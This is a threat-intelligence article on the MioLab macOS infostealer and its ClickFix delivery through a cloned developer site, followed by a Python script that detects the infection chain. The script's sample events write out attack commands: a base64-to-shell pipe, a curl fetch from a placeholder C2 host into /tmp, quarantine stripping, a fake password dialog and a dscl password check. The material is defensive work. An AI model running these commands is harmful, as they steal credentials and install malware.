Threats

MioLab Stealer for macOS Gains ClickFix Delivery, Wallet Theft, and Team API Tools

Emy Elsamnoudy
March 23, 2026

Key Takeaways

  • MioLab, also known as Nova, has rapidly evolved into a sophisticated Malware-as-a-Service (MaaS) platform targeting macOS users, actively advertised on Russian-speaking forums.
  • The stealer now includes a “ClickFix” social engineering technique that leverages fake developer sites to trick victims into executing malicious Terminal commands, bypassing macOS Gatekeeper.
  • Recent updates to MioLab’s capabilities include enhanced hardware wallet extraction, Safari cookie grabbing, Apple Notes decryption, and a full Team API for automated payload generation and data exfiltration.
  • MioLab’s operators are linked to a broader cybercrime infrastructure, utilizing bulletproof hosting from FEMO IT Solutions Ltd. (Defhost) and repurposing old C2 domains for new phishing campaigns.

MioLab, an advanced macOS infostealer also tracked as Nova, has established itself as a leading Malware-as-a-Service (MaaS) platform. It is built specifically to compromise Apple systems, and its traction is further evidence that macOS can no longer be treated as a low-risk environment.


The malware’s prevalence on Russian-speaking underground forums underscores a growing trend where cybercriminals increasingly target macOS users. As Apple’s market share expands among high-value individuals such as software engineers, corporate executives, and cryptocurrency investors, Macs present an increasingly lucrative attack surface for threat actors.

MioLab operates through a web panel and deploys a compact C-language payload of roughly 100 KB. The small footprint is pitched as an evasion feature, although signature-based antivirus does not depend on file size; what the small, frequently rebuilt binary does buy the operators is a short-lived hash per victim campaign. The stealer supports both Intel x86-64 and Apple Silicon ARM64 and is compatible with macOS versions ranging from Sierra to Tahoe.

The malware’s extensive capabilities include the theft of browser credentials, draining of cryptocurrency wallets, harvesting of password manager data, and exfiltration of files. A premium module further extends its reach to hardware wallets like Ledger and Trezor, enabling the theft of critical 24-word BIP39 recovery seed phrases.

Analysts at LevelBlue have closely monitored MioLab’s rapid evolution, noting an unusually accelerated development pace for an infostealer. Reviewing changelogs up to February 2026, researchers confirmed substantial enhancements. These include a re-engineered hardware wallet extraction module, the ability to decrypt Apple Notes directly on the compromised device, a fully functional Safari cookie grabber, and the integration of a comprehensive Team API.

This newly implemented Team API significantly enhances operational efficiency for criminal groups, allowing them to programmatically generate payloads and download exfiltrated logs without direct interaction with the web panel. Furthermore, the platform incorporates Telegram bot binding, providing real-time victim notifications to organized cybercriminal affiliates, often referred to as “traffers.”

Investigations into MioLab’s infrastructure reveal that its operators manage a broader cybercrime ecosystem. The malware’s administrative panel, previously hosted at playavalon[.]org, has been repurposed to facilitate an Ethereum token airdrop phishing campaign, effectively converting residual traffic from old command-and-control indicators into new fraudulent activities.

Both MioLab’s operations and the associated phishing campaigns have been traced back to FEMO IT Solutions Ltd., a bulletproof hosting provider operating under the Defhost brand. This provider is known for sheltering various malware families, offering a protective layer against law enforcement intervention.

ClickFix Delivery: Social Engineering Through the Terminal

A particularly insidious addition to MioLab’s arsenal is its “ClickFix” infection chain. This technique employs social engineering to persuade victims into voluntarily executing malicious commands within their macOS Terminal. The malware’s panel features a one-click utility where operators simply input their server credentials, and the system automatically generates a Terminal payload. This payload is then disseminated through deceptive channels such as fake CAPTCHA pages or meticulously cloned developer portals.

Shortly before this publication, researcher Marcelo Rivero uncovered an active malvertising campaign distributing MioLab through a convincing replica of the documentation site for Claude Code, Anthropic's command-line AI coding tool. Cloning a developer-facing site let the campaign target the tool's developer audience.

The campaign was precisely engineered to ensnare high-value targets, particularly developers who are accustomed to executing commands in the Terminal. For Windows users, the cloned site presented entirely legitimate installation instructions, appearing visually authentic. However, macOS users were served a ClickFix-style payload.

The initial stage of the attack was a Base64-encoded command that, once decoded and executed, launched a curl loader. The loader fetched the Mach-O payload, wrote it to the /tmp directory, and ran xattr -c on it to strip Apple's com.apple.quarantine extended attribute so that Gatekeeper would not assess the file. In practice, files fetched with curl are not quarantined in the first place (the attribute is applied by quarantine-aware applications such as browsers and mail clients), so the xattr step is insurance; the real Gatekeeper bypass is that the victim launches an unsigned binary directly from the Terminal, a path Gatekeeper does not intercept.

After circumventing Gatekeeper, the malware forcibly closed any open Terminal windows and presented a fraudulent System Preferences password dialog via AppleScript. This tactic aimed to trick users into divulging their login credentials. The captured password was subsequently validated against the local directory service using the dscl utility. Upon successful verification, MioLab initiated a comprehensive data collection process, gathering browser cookies, stored passwords, cryptocurrency wallet files, Apple Notes, Telegram session data, and documents from the user’s Desktop and Downloads folders. All collected data was then compressed into a ZIP archive and uploaded to the attacker’s command-and-control server.

What You Should Do

  • Exercise Caution with Password Prompts: Users should be highly suspicious of unexpected password dialogs, especially after installing or interacting with newly downloaded applications. Always verify the legitimacy of such prompts.
  • Monitor Sensitive System Utilities: Security teams should implement strict monitoring or blocking policies for sensitive system utilities like dscl, osascript, and system_profiler when invoked by unsigned applications.
  • Audit Access to Critical Directories: Regularly audit access to browser profile directories and the macOS login keychain (~/Library/Keychains/login.keychain-db) to detect unauthorized reads by processes other than the browser or securityd.
  • Block Malicious Domains: Implement network-level blocking for known malicious domains, including socifiapp[.]com, to prevent communication with C2 servers.
  • Inspect Suspicious Network Traffic: Flag and investigate any suspicious curl POST requests directed to external APIs, as these may indicate data exfiltration attempts.
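
As an added example, not part of the original article nor of LevelBlue's or Rivero's research, the following Python script turns the detection advice above and the infection chain described earlier (Base64-to-shell, curl to /tmp, xattr -c, fake password dialog via osascript, password check via dscl, and sensitive utilities launched by an unsigned parent) into a correlation rule over process-execution telemetry. The JSON field names (ts, user, exe, parent_signed, cmdline), the regexes, the example C2 hostname and the sample log lines are constructed assumptions for illustration, not a real EDR schema or captured MioLab data.

```python
"""Correlate the stages of a ClickFix-style macOS stealer chain in process telemetry.

Added example. The JSON event schema (ts, user, exe, parent_signed, cmdline),
the regexes and the sample events are constructed for illustration; they are
not a real EDR format and not captured MioLab data.
"""
import json
import re
from collections import defaultdict

# Chain stages described in the article, each as a regex over the command line.
STAGES = [
    ("b64_to_shell", re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b")),
    ("curl_to_tmp", re.compile(r"\bcurl\b.*(-o|--output)\s+/(private/)?tmp/")),
    ("quarantine_strip", re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b")),
    ("fake_pw_dialog", re.compile(r"\bosascript\b.*display dialog.*hidden answer")),
    ("pw_validate", re.compile(r"\bdscl\b.*-authonly\b")),
]

# Utilities the article says should not be launched by unsigned parents.
SENSITIVE_UTILS = {"dscl", "osascript", "system_profiler"}

WINDOW_SECS = 300   # stages must occur within 5 minutes for the same user
MIN_STAGES = 3      # distinct chain stages needed before alerting


def classify(event):
    """Return the set of stage names (plus unsigned-parent flags) an event matches."""
    hits = {name for name, rx in STAGES if rx.search(event["cmdline"])}
    exe = event["exe"].rsplit("/", 1)[-1]
    if exe in SENSITIVE_UTILS and not event.get("parent_signed", True):
        hits.add("unsigned_parent_" + exe)
    return hits


def detect(lines):
    """Parse JSON lines, bucket matches per user, alert on >= MIN_STAGES within WINDOW_SECS."""
    per_user = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        stages = classify(ev)
        if stages:
            per_user[ev["user"]].append((ev["ts"], stages))

    alerts = []
    for user, evs in per_user.items():
        evs.sort(key=lambda e: e[0])
        for i, (t0, _) in enumerate(evs):
            seen = set()
            for ts, stages in evs[i:]:
                if ts - t0 > WINDOW_SECS:
                    break
                seen |= stages
            chain = {s for s in seen if not s.startswith("unsigned_parent_")}
            if len(chain) >= MIN_STAGES:
                alerts.append({"user": user, "start": t0, "stages": sorted(seen)})
                break   # one alert per user is enough for this demo
    return alerts


# Constructed sample telemetry: a ClickFix chain for user "dev", plus benign noise.
SAMPLE_EVENTS = [
    {"ts": 100, "user": "dev", "exe": "/bin/zsh", "parent_signed": True,
     "cmdline": "echo Y3VybCAuLi4= | base64 -d | sh"},
    {"ts": 101, "user": "dev", "exe": "/usr/bin/curl", "parent_signed": True,
     "cmdline": "curl -sL -o /tmp/.u https://c2.example.invalid/p"},
    {"ts": 102, "user": "dev", "exe": "/usr/bin/xattr", "parent_signed": True,
     "cmdline": "xattr -c /tmp/.u"},
    {"ts": 110, "user": "dev", "exe": "/usr/bin/osascript", "parent_signed": False,
     "cmdline": "osascript -e 'display dialog \"System Preferences wants to make changes.\" default answer \"\" with hidden answer'"},
    {"ts": 112, "user": "dev", "exe": "/usr/bin/dscl", "parent_signed": False,
     "cmdline": "dscl . -authonly dev hunter2"},
    # Benign: an admin reading a user record from a signed parent (Terminal).
    {"ts": 5000, "user": "admin", "exe": "/usr/bin/dscl", "parent_signed": True,
     "cmdline": "dscl . -read /Users/admin"},
    # Benign: a developer clearing xattrs on a build artefact, hours later, on its own.
    {"ts": 6000, "user": "dev", "exe": "/usr/bin/xattr", "parent_signed": True,
     "cmdline": "xattr -c /Users/dev/Projects/build/app"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def run_sample():
    """Run the detector over the constructed log; returns one alert for user 'dev'."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in run_sample():
        print(json.dumps(alert))
```

The single xattr -c at ts 6000 and the admin's dscl read produce no alert on their own: requiring several distinct stages inside a short window is what keeps a rule like this from firing on ordinary developer and IT activity, while the unsigned-parent flags on osascript and dscl are carried into the alert as supporting context rather than counted as stages.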

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
